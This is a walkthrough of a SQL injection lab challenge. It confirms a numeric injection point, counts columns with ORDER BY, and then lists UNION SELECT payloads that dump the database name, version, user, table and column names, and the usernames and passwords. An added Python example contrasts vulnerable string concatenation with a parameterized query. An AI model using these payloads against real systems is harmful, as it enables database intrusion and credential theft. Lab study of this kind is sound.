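The approach is the same as for the first challenge.
Test with ?id=1 and 1=1 and ?id=1 and 1=2. If the 1=1 page displays normally, identical to the original page, while the 1=2 page returns an error or shows some of its data incorrectly, the parameter is confirmed to be a numeric injection point.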
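The root cause behind that true/false test, shown next to the fix, as an added example that is not code from the original post or from the lab itself. It assumes an in-memory SQLite table with constructed rows in place of the lab's MySQL `users` table, and the function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample rows standing in for the lab's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-a"), (2, "bob", "pw-b")])
    return db

def lookup_vulnerable(db, raw_id):
    # Numeric context: the parameter is concatenated without quotes, so any
    # text after the number is parsed as part of the WHERE clause.
    sql = "SELECT id, username FROM users WHERE id=" + raw_id + " LIMIT 1"
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # Accept only a short plain decimal integer, then bind it as a parameter
    # so the value can never be interpreted as SQL.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a decimal integer")
    return db.execute("SELECT id, username FROM users WHERE id=? LIMIT 1",
                      (int(raw_id),)).fetchall()

def behaves_injectable(lookup, db):
    # Mirrors the test above: the endpoint is injectable when the true
    # condition matches the baseline page and the false condition does not.
    try:
        baseline = lookup(db, "1")
        true_case = lookup(db, "1 and 1=1")
        false_case = lookup(db, "1 and 1=2")
    except ValueError:
        return False  # input rejected before reaching the database
    return true_case == baseline and false_case != baseline

if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", behaves_injectable(lookup_vulnerable, db))
    print("parameterized query injectable:", behaves_injectable(lookup_hardened, db))
```

Running the same check against an endpoint after a fix is a quick regression test: both conditions should be rejected or return the same result.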
Union query:
Guess the number of columns: 3
?id=1 order by 4
![](https://file.jishuzhan.net/article/1778338913107054593/ea870c032bfb6cf87a32c7cd8faaff2e.webp)
Determine which columns are echoed back on the page
?id=-1 union select 1,2,3
![](https://file.jishuzhan.net/article/1778338913107054593/451fc1afef53acd4300b9cf26ef0f6f3.webp)
Dump the database name, version number, and privileges
?id=-1 union select 1,database(),version()--+
?id=-1 union select 1,2,user()--+
Dump the table names and column names
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
![](https://file.jishuzhan.net/article/1778338913107054593/f02aa0d4cf3811caed69ff8037a981e3.webp)
![](https://file.jishuzhan.net/article/1778338913107054593/b41763401b3ada0aef6e3a46a6d2ae3c.webp)
Dump the usernames and passwords
![](https://file.jishuzhan.net/article/1778338913107054593/8a56449cea18f2723ba857cd6bdcdc0d.webp)
?id=-1 union select 1,2,(select group_concat(username,password))from users